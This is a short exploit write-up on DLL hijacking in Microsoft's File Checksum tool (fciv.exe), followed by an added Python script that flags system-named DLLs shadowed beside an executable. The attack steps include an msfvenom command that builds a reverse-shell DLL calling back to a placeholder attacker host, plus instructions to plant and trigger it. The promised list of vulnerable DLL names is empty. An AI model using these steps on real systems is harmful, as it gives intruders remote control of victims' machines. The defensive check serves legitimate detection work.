Microsoft File Checksum DLL Hijacking Attack

Microsoft File Checksum, running as the process fciv.exe, will load and execute malicious Dynamic Link Libraries (DLLs) that use the following vulnerable names:


Exploitation occurs when these remade DLL files are placed in the same directory as FCIV.

So if an attacker is able to place a DLL with one of these vulnerable names there, running the file verification will load the malicious DLL directly.


  • Generate a reverse shell TCP payload using msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=attackerip LPORT=4444 -f dll > /root/CRYPTSP.dll

  • Place the DLL file in the same directory as the fciv executable

  • Execute fciv.exe with the malicious DLL file

fciv.exe CRYPTSP.dll
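
A defensive check for the condition described above, as an added example that is not part of the original page or of any Microsoft tooling: it lists DLLs that sit beside an executable and carry the name of a DLL in the system directory (such as CRYPTSP.dll), and reports whether their bytes differ from the system copy. The function names and the two directory arguments are assumptions made for this example.

```python
import hashlib
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large DLLs do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_shadowing_dlls(app_dir, system_dir):
    """Return findings for DLLs in app_dir whose name also exists in system_dir.

    Windows file names are case-insensitive, so names are compared lowercased.
    Each finding records whether the local copy differs from the system copy.
    """
    system_dlls = {
        p.name.lower(): p
        for p in Path(system_dir).iterdir()
        if p.is_file() and p.suffix.lower() == ".dll"
    }
    findings = []
    for local in sorted(Path(app_dir).iterdir()):
        if not local.is_file() or local.suffix.lower() != ".dll":
            continue
        system_copy = system_dlls.get(local.name.lower())
        if system_copy is None:
            continue  # not a system DLL name, so nothing is being shadowed
        local_hash = sha256_of(local)
        findings.append({
            "name": local.name,
            "path": str(local),
            "sha256": local_hash,
            "differs_from_system": local_hash != sha256_of(system_copy),
        })
    return findings


if __name__ == "__main__":
    import sys
    # Assumed usage: script.py <directory holding fciv.exe> <system DLL directory>
    for finding in find_shadowing_dlls(sys.argv[1], sys.argv[2]):
        status = "DIFFERS" if finding["differs_from_system"] else "same bytes"
        print(f'{finding["path"]}  {status}  sha256={finding["sha256"]}')
```

Any finding marked DIFFERS in the directory that holds fciv.exe deserves review, since the tool has no reason to ship its own copy of a system DLL.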